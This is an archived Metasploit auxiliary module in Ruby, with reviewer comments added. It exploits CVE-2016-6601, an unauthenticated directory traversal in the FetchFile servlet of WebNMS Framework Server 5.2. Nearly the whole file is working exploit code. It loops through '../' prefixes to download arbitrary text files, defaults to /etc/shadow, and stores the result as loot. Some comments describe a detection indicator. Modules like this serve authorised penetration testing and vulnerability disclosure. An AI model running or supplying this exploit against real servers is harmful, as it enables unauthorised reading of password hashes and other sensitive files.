##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# NOTE !!!
# This exploit is kept here for archiving purposes only.
# Please refer to and use the version that has been accepted into the Metasploit framework.
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
  # Framework mixins. The HTTP helpers called below (send_request_cgi,
  # normalize_uri, target_uri, peer) and the loot helper (store_loot) are
  # presumably supplied by these two modules; their definitions are not in
  # this file.
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report

  # Registers module metadata and the user-facing options.
  #
  # Option notes relevant to #run:
  #   * FILEPATH is registered as optional but defaults to '/etc/shadow',
  #     so File.basename in #run normally receives a String.
  #   * TRAVERSAL_PATH has no default; #run selects its strategy on whether
  #     this option is nil.
  #   * MAX_TRAVERSAL (default 10) bounds the number of HTTP requests made
  #     in the discovery loop, one request per depth.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WebNMS Framework Server Arbitrary Text File Download',
      'Description' => %q{
        This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an
        unauthenticated user to download files off the file system by using a directory
        traversal attack on the FetchFile servlet.
        Note that only text files can be downloaded properly, as any binary file will get
        mangled by the servlet. Also note that for Windows targets you can only download
        files that are in the same drive as the WebNMS installation.
        This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on
        Windows and Linux.
      },
      'Author' =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'CVE', '2016-6601' ],
          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/2712' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/webnms-5.2-sp1-pwn.txt']
        ],
      'DisclosureDate' => 'Jul 4 2016'))
    register_options(
      [
        OptPort.new('RPORT', [true, 'The target port', 9090]),
        OptString.new('TARGETURI', [ true, "WebNMS path", '/']),
        OptString.new('FILEPATH', [ false, "The filepath of the file you want to download", '/etc/shadow']),
        OptString.new('TRAVERSAL_PATH', [ false, "The traversal path to the target file (if you know it)"]),
        OptInt.new('MAX_TRAVERSAL', [ false, "Maximum traversal path depth (if you don't know the traversal path)", 10]),
      ], self.class)
  end

  # Module entry point.
  #
  # Two strategies, chosen by whether TRAVERSAL_PATH was set:
  #   * unset: requests "../" * MAX_TRAVERSAL + FILEPATH, then shrinks the
  #     prefix by one "../" per attempt until get_file returns a body or the
  #     depth reaches zero. Depth 0 (FILEPATH with no prefix) is never tried,
  #     because the loop condition is traversal_size > 0.
  #   * set: a single get_file call with exactly that value; FILEPATH is then
  #     used only to name the loot file.
  #
  # On success the body is echoed in verbose mode and saved with store_loot
  # under the 'webnms.http' type, keyed by RHOST; on failure an error is
  # printed and the method returns nil.
  #
  # NOTE(review): FILEPATH is optional in register_options. If it were
  # cleared while TRAVERSAL_PATH is set, File.basename(nil) would raise
  # TypeError after a successful download — verify against the framework's
  # option validation.
  def run
    file = nil
    if datastore['TRAVERSAL_PATH'] == nil
      traversal_size = datastore['MAX_TRAVERSAL']
      # One HTTP request per depth, from MAX_TRAVERSAL down to 1.
      while traversal_size > 0
        file = get_file("../" * traversal_size + datastore['FILEPATH'])
        if file != nil
          break
        end
        traversal_size -= 1
      end
    else
      file = get_file(datastore['TRAVERSAL_PATH'])
    end
    if file == nil
      print_error("#{peer} - Failed to download the specified file.")
      return
    else
      # Body is only printed with VERBOSE; it is always written to loot.
      vprint_line(file)
      fname = File.basename(datastore['FILEPATH'])
      path = store_loot(
        'webnms.http',
        'text/plain',
        datastore['RHOST'],
        file,
        fname
      )
      print_good("File download successful, file saved in #{path}")
    end
  end

  # Issues one GET to <TARGETURI>/servlets/FetchFile with `path` as the
  # fileName query parameter.
  #
  # The body is returned only when the response exists, its status is 200,
  # the body is non-empty and it matches /File Found/; any other outcome
  # (no response, other status, empty body, marker absent) yields nil.
  #
  # Detection note: the observable indicator of this check is a request to
  # the FetchFile servlet whose fileName parameter carries "../" sequences
  # (built by #run); a 200 reply containing "File Found" is what the module
  # treats as confirmation.
  #
  # @param path [String] value sent as the fileName parameter
  # @return [String, nil] response body, or nil when the checks fail
  def get_file(path)
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'servlets', 'FetchFile'),
      'method' =>'GET',
      'vars_get' => { 'fileName' => path }
    })
    if res && res.code == 200 && res.body.to_s.length > 0 && res.body.to_s =~ /File Found/
      return res.body.to_s
    else
      return nil
    end
  end
end